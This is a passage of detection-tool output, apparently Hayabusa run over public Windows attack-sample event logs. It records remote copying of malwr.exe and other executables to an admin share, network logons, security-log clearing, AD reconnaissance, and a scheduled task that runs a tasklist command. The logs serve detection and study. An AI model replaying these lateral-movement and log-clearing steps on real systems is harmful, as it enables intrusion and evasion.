0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:26.981 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.061 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.071 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:27.081 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: malwr.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:45.488 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:45.548 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:47.721 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:56.403 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:56.414 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:58.386 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:04.105 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Fonts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:04.115 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Media\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:07.249 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:07.529 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:07.630 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:07.700 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:09.913 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\setup.bat | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:09.923 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:09.933 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:10.053 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\ui\SwDRM.dll | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:24:10.063 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\Temp\wodCmdTerm.exe | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-19 07:15:36.036 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x10fac2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx 2019-03-19 07:15:49.583 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbcc,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx 2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x10fbeb,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx 2019-03-19 07:15:49.614 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: PC01 | IP Addr: 10.0.2.17 | LID: 0x10fc09,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx 2019-03-19 07:15:49.692 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x110085,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_WMI_4624_4688_TargetHost.evtx 2019-03-19 08:23:37.147 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:43.570 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e162,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:52.491 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: user01 | Computer: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:52.507 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: user01 | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x15e1a7,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:52.522 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:52.538 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:23:57.397 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: WIN-77LTAPHIQ1R$ | Share Name: \\*\SYSVOL | Share Path: \??\C:\Windows\SYSVOL\sysvol | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x15e25f,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:07.601 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:11.413 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:11.741 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:15.647 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,../hayabusa-rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 08:24:15.662 +09:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,../hayabusa-rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/dicovery_4661_net_group_domain_admins_target.evtx 2019-03-19 09:02:00.383 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Evas,Security Log Cleared,User: administrator,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.179 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: ANONYMOUS LOGON | Computer: NULL | IP Addr: 10.0.2.17 | LID: 0x17e29a,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.210 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2aa,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\IPC$ | Share Path: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.226 +09:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: Administrator | Computer: | IP Addr: 10.0.2.17 | LID: 0x17e2c0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.257 +09:00,WIN-77LTAPHIQ1R.example.corp,4672,info,,Admin Logon,User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx 2019-03-19 09:02:04.319 +09:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,../hayabusa-rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx 2019-03-19 09:02:04.351 +09:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | 